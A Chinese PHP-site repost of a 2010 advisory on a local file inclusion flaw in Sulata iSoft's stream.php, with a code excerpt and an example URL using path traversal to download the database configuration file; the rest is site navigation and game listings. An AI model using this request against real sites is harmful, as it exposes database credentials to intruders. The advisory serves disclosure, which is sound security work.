Php文档 Php问答行业资讯 Php论坛 Php手册 Php博客

游戏榜单

软件榜单

关闭导航

热搜榜

热门下载

热门标签

php爱好者> php文档>Sulata iSoft (stream.php)本地文件包含

Sulata iSoft (stream.php)本地文件包含

时间：2010-12-11 来源：Sudden_death

发布日期：2010-12.11
发布作者：Sudden_death

影响版本：未知

漏洞类型：文件包含
漏洞描述：stream.php下载功能对path过滤不严，导致本地加载任何文件漏洞。

漏洞分析：stream.php

.....

//include_once("../home/library.php");

include_once("../connection.php"); <----------------------- look here,,

This is the config

suConnect();

.....

通过本漏洞可下载数据库配置文件。

http://www.site.com/_admin/stream.php?path=../connection.php

标签分类：文件包含

相关阅读更多 +

崩坏星穹铁道银河球棒侠传说魔王篇试用角色成就如何完成_崩坏星穹铁道银河球棒侠传说魔王篇试用角色成就怎么快速完成(崩坏星穹铁道银河棒球侠) 游戏攻略 2025-06-03
迷雾大陆s7魂灵师流派bd要如何搭配_迷雾大陆s7魂灵师流派解析(迷雾怎么组合道具) 游戏攻略 2025-06-03
碧蓝航线科研船换装投影功能用法介绍_碧蓝航线科研船换装投影功能解析(碧蓝航线科研船经验后宅和委托算吗) 游戏攻略 2025-06-02
最终幻想14水晶世界珠串万货街感恩大酬宾任务攻略_最终幻想14水晶世界珠串万货街感恩大酬宾任务要如何完成(最终幻想14水晶世界) 游戏攻略 2025-06-02
坦克世界端午节龙舟活动介绍_坦克世界端午节龙舟活动都有哪些内容游戏攻略 2025-06-02

排行榜更多 +

翌日波奇狗的历险记手机版下载

翌日波奇狗的历险记手机版下载

休闲益智下载

怪兽远征安卓版下载

怪兽远征安卓版下载

角色扮演下载

谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用下载

4
谷歌卫星地图免费版下载
11.98MB · 98℃

1970-01-01

下载
5
kingsofpool官方正版下载
72.37MB · 96℃

1970-01-01

下载
6
毒药轮盘手机版下载
162.05M · 98℃

1970-01-01

下载